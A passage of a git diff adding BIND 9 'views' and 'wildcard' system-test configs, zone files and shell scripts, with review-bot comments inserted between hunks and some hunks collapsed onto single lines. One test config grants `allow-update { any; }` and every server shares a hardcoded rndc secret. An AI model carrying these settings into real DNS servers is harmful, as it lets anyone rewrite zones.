+ auto-dnssec maintain;
+ inline-signing yes;
+ };
+};
+
+view "external" {
+ match-clients { any; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "example" {
+ type primary;
+ file "example.db";
+ };
+
+ zone "clone" {
+ in-view internal;
+ forward only;
+ forwarders { 10.53.0.5; };
+ };
+
+ zone "1.10.in-addr.arpa" {
+ in-view internal;
+ };
+
+ zone "inline" {
+ type primary;
+ file "external/inline.db";
+ key-directory "external";
+ auto-dnssec maintain;
+ inline-signing yes;
+ };
+};
diff --git a/bin/tests/system/views/ns2/named3.conf.in b/bin/tests/system/views/ns2/named3.conf.in
new file mode 100644
index 0000000..838cfb8
--- /dev/null
+++ b/bin/tests/system/views/ns2/named3.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "zones.conf";
diff --git a/bin/tests/system/views/ns3/child.clone.db b/bin/tests/system/views/ns3/child.clone.db
new file mode 100644
index 0000000..9b90023
--- /dev/null
+++ b/bin/tests/system/views/ns3/child.clone.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns3. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ NS ns3
+@ TXT This is NS3.
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/views/ns3/internal.db b/bin/tests/system/views/ns3/internal.db
new file mode 100644
index 0000000..c93c2b0
--- /dev/null
+++ b/bin/tests/system/views/ns3/internal.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns3.example.
+ns3.example. A 10.53.0.3
+
+$ORIGIN example.
+a A 10.1.0.1
+ MX 10 intmail.example.
+
+intmail A 10.1.0.2
diff --git a/bin/tests/system/views/ns3/named1.conf.in b/bin/tests/system/views/ns3/named1.conf.in
new file mode 100644
index 0000000..bec49f5
--- /dev/null
+++ b/bin/tests/system/views/ns3/named1.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ allow-update { any; };
+ file "internal.db";
+};
+
+zone "child.clone" {
+ type primary;
+ file "child.clone.db";
+};
diff --git a/bin/tests/system/views/ns3/named2.conf.in b/bin/tests/system/views/ns3/named2.conf.in
new file mode 100644
index 0000000..3becdd6
--- /dev/null
+++ b/bin/tests/system/views/ns3/named2.conf.in
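Review bot: In views/ns3/named1.conf.in zone `example` carries `allow-update { any; };`, so any client that can reach 10.53.0.3 may rewrite the zone without a TSIG key, on a server that also has `recursion yes`. The views tests.sh added in this commit sends its only dynamic update to 10.53.0.2 for zone `clone`, so this ACL looks unused by the test. If that reading is right, drop the line; if another script depends on it, restrict it to the sending address and add a comment such as `/* test-only: unauthenticated updates from the test client */`.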
@@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "internal.bk"; +}; + +zone "child.clone" { + type primary; + file "child.clone.db"; +}; diff --git a/bin/tests/system/views/ns5/child.clone.db b/bin/tests/system/views/ns5/child.clone.db new file mode 100644 index 0000000..e29143b --- /dev/null +++ b/bin/tests/system/views/ns5/child.clone.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns3 +@ TXT This is NS5. +ns3 A 10.53.0.3 
diff --git a/bin/tests/system/views/ns5/named.conf.in b/bin/tests/system/views/ns5/named.conf.in new file mode 100644 index 0000000..4b9e236 --- /dev/null +++ b/bin/tests/system/views/ns5/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "child.clone" { + type primary; + file "child.clone.db"; +}; diff --git a/bin/tests/system/views/setup.sh b/bin/tests/system/views/setup.sh new file mode 100644 index 0000000..278cb4d --- /dev/null +++ b/bin/tests/system/views/setup.sh 
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+SYSTEMTESTTOP=..
+# shellcheck source=conf.sh
+. $SYSTEMTESTTOP/conf.sh
+
+cp -f ns2/example1.db ns2/example.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named1.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+#
+# We remove k1 and k2 as KEYGEN is deterministic when given the
+# same source of "random" data and we want different keys for
+# internal and external instances of inline.
+#
+$KEYGEN -K ns2/internal -a ${DEFAULT_ALGORITHM} -q inline > /dev/null 2>&1
+$KEYGEN -K ns2/internal -a ${DEFAULT_ALGORITHM} -qfk inline > /dev/null 2>&1
+k1=$($KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -q inline 2> /dev/null)
+k2=$($KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -qfk inline 2> /dev/null)
+$KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -q inline > /dev/null 2>&1
+$KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -qfk inline > /dev/null 2>&1
+test -n "$k1" && rm -f ns2/external/"$k1".*
+test -n "$k2" && rm -f ns2/external/"$k2".*
diff --git a/bin/tests/system/views/tests.sh b/bin/tests/system/views/tests.sh
new file mode 100644
index 0000000..5f5daad
--- /dev/null
+++ b/bin/tests/system/views/tests.sh
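Review bot: In views/setup.sh every `$KEYGEN` call discards stderr (`> /dev/null 2>&1` or `2> /dev/null`) while the script runs under `set -e`, so a key-generation failure stops setup with no message explaining why. Keeping stderr visible avoids that, e.g. `$KEYGEN -K ns2/internal -a ${DEFAULT_ALGORITHM} -q inline > /dev/null`, and the same applies to the other five calls. The closing `test -n "$k2" && rm -f ...` also makes the script return non-zero when `$k2` is empty. Writing it as `if [ -n "$k2" ]; then rm -f ns2/external/"$k2".*; fi` avoids that.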
@@ -0,0 +1,190 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. $SYSTEMTESTTOP/conf.sh + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd +noauth -p "${PORT}" "$@" +} + +dig_with_shortopts() { + "$DIG" +tcp +short -p "${PORT}" "$@" +} + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +echo_i "fetching a.example from ns2's initial configuration" +dig_with_opts a.example. @10.53.0.2 any > dig.out.ns2.1 || status=1 + +echo_i "fetching a.example from ns3's initial configuration" +dig_with_opts a.example. 
@10.53.0.3 any > dig.out.ns3.1 || status=1 + +echo_i "copying in new configurations for ns2 and ns3" +rm -f ns2/named.conf ns3/named.conf ns2/example.db +cp -f ns2/example2.db ns2/example.db +copy_setports ns2/named2.conf.in ns2/named.conf +copy_setports ns3/named2.conf.in ns3/named.conf + +echo_i "reloading ns2 and ns3 with rndc" +nextpart ns2/named.run > /dev/null +nextpart ns3/named.run > /dev/null +rndc_reload ns2 10.53.0.2 +rndc_reload ns3 10.53.0.3 + +echo_i "wait for reload to complete" +ret=0 +_check_reload() ( + nextpartpeek ns2/named.run | grep "all zones loaded" > /dev/null && \ + nextpartpeek ns3/named.run | grep "all zones loaded" > /dev/null && \ + nextpartpeek ns3/named.run | grep "zone_dump: zone example/IN: enter" > /dev/null +) +retry_quiet 10 _check_reload || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "fetching a.example from ns2's 10.53.0.4, source address 10.53.0.4" +dig_with_opts -b 10.53.0.4 a.example. @10.53.0.4 any > dig.out.ns4.2 || status=1 + +echo_i "fetching a.example from ns2's 10.53.0.2, source address 10.53.0.2" +dig_with_opts -b 10.53.0.2 a.example. @10.53.0.2 any > dig.out.ns2.2 || status=1 + +echo_i "fetching a.example from ns3's 10.53.0.3, source address defaulted" +dig_with_opts @10.53.0.3 a.example. any > dig.out.ns3.2 || status=1 + +echo_i "comparing ns3's initial a.example to one from reconfigured 10.53.0.2" +digcomp dig.out.ns3.1 dig.out.ns2.2 || status=1 + +echo_i "comparing ns3's initial a.example to one from reconfigured 10.53.0.3" +digcomp dig.out.ns3.1 dig.out.ns3.2 || status=1 + +echo_i "comparing ns2's initial a.example to one from reconfigured 10.53.0.4" +digcomp dig.out.ns2.1 dig.out.ns4.2 || status=1 + +echo_i "comparing ns2's initial a.example to one from reconfigured 10.53.0.3" +echo_i "(should be different)" +if $PERL ../digcomp.pl dig.out.ns2.1 dig.out.ns3.2 >/dev/null +then + echo_i "no differences found. something's wrong." 
+ status=1 +fi + +echo_i "updating cloned zone in internal view" +$NSUPDATE << EOF +server 10.53.0.2 ${PORT} +zone clone +update add b.clone. 300 in a 10.1.0.3 +send +EOF +echo_i "sleeping to allow update to take effect" +sleep 5 + +echo_i "verifying update affected both views" +ret=0 +one=$(dig_with_shortopts -b 10.53.0.2 @10.53.0.2 b.clone a) +two=$(dig_with_shortopts -b 10.53.0.4 @10.53.0.2 b.clone a) +if [ "$one" != "$two" ]; then + echo_i "'$one' does not match '$two'" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying forwarder in cloned zone works" +ret=0 +one=$(dig_with_shortopts -b 10.53.0.2 @10.53.0.2 child.clone txt) +two=$(dig_with_shortopts -b 10.53.0.4 @10.53.0.2 child.clone txt) +three=$(dig_with_shortopts @10.53.0.3 child.clone txt) +four=$(dig_with_shortopts @10.53.0.5 child.clone txt) +echo "$three" | grep NS3 > /dev/null || { ret=1; echo_i "expected response from NS3 got '$three'"; } +echo "$four" | grep NS5 > /dev/null || { ret=1; echo_i "expected response from NS5 got '$four'"; } +if [ "$one" = "$two" ]; then + echo_i "'$one' matches '$two'" + ret=1 +fi +if [ "$one" != "$three" ]; then + echo_i "'$one' does not match '$three'" + ret=1 +fi +if [ "$two" != "$four" ]; then + echo_i "'$two' does not match '$four'" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying inline zones work with views" +ret=0 +wait_for_signed() { + "$DIG" -p "${PORT}" @10.53.0.2 -b 10.53.0.2 +dnssec DNSKEY inline > dig.out.internal + "$DIG" -p "${PORT}" @10.53.0.2 -b 10.53.0.5 +dnssec DNSKEY inline > dig.out.external + grep "ANSWER: 4," dig.out.internal > /dev/null || return 1 + grep "ANSWER: 4," dig.out.external > /dev/null || return 1 + return 0 +} +retry_quiet 10 wait_for_signed || ret=1 +int=$(awk '$4 == "DNSKEY" { print $8 }' dig.out.internal | sort) +ext=$(awk '$4 == "DNSKEY" { print $8 }' dig.out.external | sort) +test "$int" != "$ext" || ret=1 +if [ $ret != 0 ]; 
then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying adding of multiple inline zones followed by reconfiguration works" + +[ ! -f ns2/zones.conf ] && touch ns2/zones.conf +copy_setports ns2/named3.conf.in ns2/named.conf + +i=1 +while [ $i -lt 50 ]; do + ret=0 + zone_name=$(printf "example%03d.com" $i) + + # Add a new zone to the configuration. + cat >> ns2/zones.conf <<-EOF + zone "${zone_name}" { + type master; + file "db.${zone_name}"; + dnssec-dnskey-kskonly yes; + auto-dnssec maintain; + inline-signing yes; + }; + EOF + + # Create a master file for the zone. + cat > "ns2/db.${zone_name}" <<-EOF + \$TTL 86400 + @ IN SOA localhost. hostmaster.localhost ( + 1612542642 ; serial + 12H ; refresh + 1H ; retry + 2w ; expiry + 1h ; minimum + ) + @ IN NS localhost + localhost IN A 127.0.0.1 + EOF + + $KEYGEN -q -Kns2 -fk -aecdsa256 "${zone_name}" > /dev/null + $RNDCCMD 10.53.0.2 reconfig || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; break; fi + i=$((i + 1)) +done +status=$((status + ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/wildcard/clean.sh b/bin/tests/system/wildcard/clean.sh new file mode 100644 index 0000000..c690ade --- /dev/null +++ b/bin/tests/system/wildcard/clean.sh 
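Review bot: In views/tests.sh the "verifying update affected both views" check only tests `[ "$one" != "$two" ]`, so it passes when the update was never applied and both queries return an empty answer. The check should pin the record the update adds, e.g. `if [ "$one" != "10.1.0.3" ] || [ "$two" != "10.1.0.3" ]; then`. The preceding `$NSUPDATE << EOF` has no `|| status=1`, so under `set -e` a failed update ends the script before "exit status" is printed. The fixed `sleep 5` could also be replaced by a `retry_quiet` poll, as the reload check earlier in the file does. Separately, the generated zones use `-aecdsa256` and `type master` where the rest of the commit uses `${DEFAULT_ALGORITHM}` and `type primary`.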
@@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.run +rm -f ns*/named.conf +rm -f ns1/K* +rm -f ns1/*.db +rm -f ns1/*.signed +rm -f ns1/dsset-* +rm -f ns1/keyset-* +rm -f ns1/trusted.conf +rm -f ns1/private.nsec.conf +rm -f ns1/private.nsec3.conf +rm -f ns1/signer.err +rm -f */named.memstats +rm -f dig.out.ns*.test* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/wildcard/ns1/allwild.db.in b/bin/tests/system/wildcard/ns1/allwild.db.in new file mode 100644 index 0000000..71575c3 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/allwild.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN allwild.test. +allwild.test. 3600 IN SOA . . 0 0 0 0 0 +allwild.test. 3600 NS ns.example.test. +*.allwild.test. 3600 A 192.0.2.1 diff --git a/bin/tests/system/wildcard/ns1/dlv.db.in b/bin/tests/system/wildcard/ns1/dlv.db.in new file mode 100644 index 0000000..6156de6 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/dlv.db.in 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. diff --git a/bin/tests/system/wildcard/ns1/example.db.in b/bin/tests/system/wildcard/ns1/example.db.in new file mode 100644 index 0000000..f23a2cb --- /dev/null +++ b/bin/tests/system/wildcard/ns1/example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN example. +example. 3600 IN SOA . . 0 0 0 0 0 +example. 3600 NS ns.example.com. +example. 3600 NS ns.example.net. +*.example. 3600 TXT "this is a wildcard" +*.example. 3600 MX 10 host1.example. +sub.*.example. 3600 TXT "this is not a wildcard" +host1.example. 3600 A 192.0.2.1 +_ssh._tcp.host1.example. 3600 SRV 0 0 22 host1.example. +_ssh._tcp.host2.example. 3600 SRV 0 0 22 host2.example. +subdel.example. 3600 NS ns.example.com. +subdel.example. 3600 NS ns.example.net. diff --git a/bin/tests/system/wildcard/ns1/named.conf.in b/bin/tests/system/wildcard/ns1/named.conf.in new file mode 100644 index 0000000..ac02abf --- /dev/null +++ b/bin/tests/system/wildcard/ns1/named.conf.in 
@@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { type primary; file "root.db.signed"; }; + +/* + * RFC 4592 example zone. + */ +zone "allwild.test" { type primary; file "allwild.db"; }; +zone "example" { type primary; file "example.db"; }; +zone "nsec" { type primary; file "nsec.db.signed"; }; +zone "private.nsec" { type primary; file "private.nsec.db.signed"; }; + +/* + * The contents of nsec3 and private.nsec3 are specially chosen to + * have separate NSEC3 records for the "no qname proof" and the + * "closest encloser proof". + */ +zone "nsec3" { type primary; file "nsec3.db.signed"; }; +zone "private.nsec3" { type primary; file "private.nsec3.db.signed"; }; diff --git a/bin/tests/system/wildcard/ns1/nsec.db.in b/bin/tests/system/wildcard/ns1/nsec.db.in new file mode 100644 index 0000000..8869ab9 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/nsec.db.in 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +private NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/nsec3.db.in b/bin/tests/system/wildcard/ns1/nsec3.db.in new file mode 100644 index 0000000..8869ab9 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/nsec3.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +private NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/private.nsec.db.in b/bin/tests/system/wildcard/ns1/private.nsec.db.in new file mode 100644 index 0000000..b7cc222 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/private.nsec.db.in 
@@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/private.nsec3.db.in b/bin/tests/system/wildcard/ns1/private.nsec3.db.in new file mode 100644 index 0000000..566b3f8 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/private.nsec3.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +b A 1.2.3.4 +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/root.db.in b/bin/tests/system/wildcard/ns1/root.db.in new file mode 100644 index 0000000..ffeb0a6 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/root.db.in 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil hostmaster.root-servers.nil 1 1800 900 604800 86400 +@ NS a.root-servers.nil +a.root-servers.nil A 10.53.0.1 +nsec NS a.root-servers.nil +nsec3 NS a.root-servers.nil diff --git a/bin/tests/system/wildcard/ns1/sign.sh b/bin/tests/system/wildcard/ns1/sign.sh new file mode 100755 index 0000000..493b057 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/sign.sh 
@@ -0,0 +1,96 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=wildcard + +dssets= + +# RFC 4592 example zone. +cp allwild.db.in allwild.db +cp example.db.in example.db + +zone=nsec +infile=nsec.db.in +zonefile=nsec.db +outfile=nsec.db.signed +dssets="$dssets dsset-${zone}${TP}" + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +zone=private.nsec +infile=private.nsec.db.in +zonefile=private.nsec.db +outfile=private.nsec.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > private.nsec.conf + +zone=nsec3 +infile=nsec3.db.in +zonefile=nsec3.db +outfile=nsec3.db.signed +dssets="$dssets dsset-${zone}${TP}" + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -3 - -H 10 -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +zone=private.nsec3 
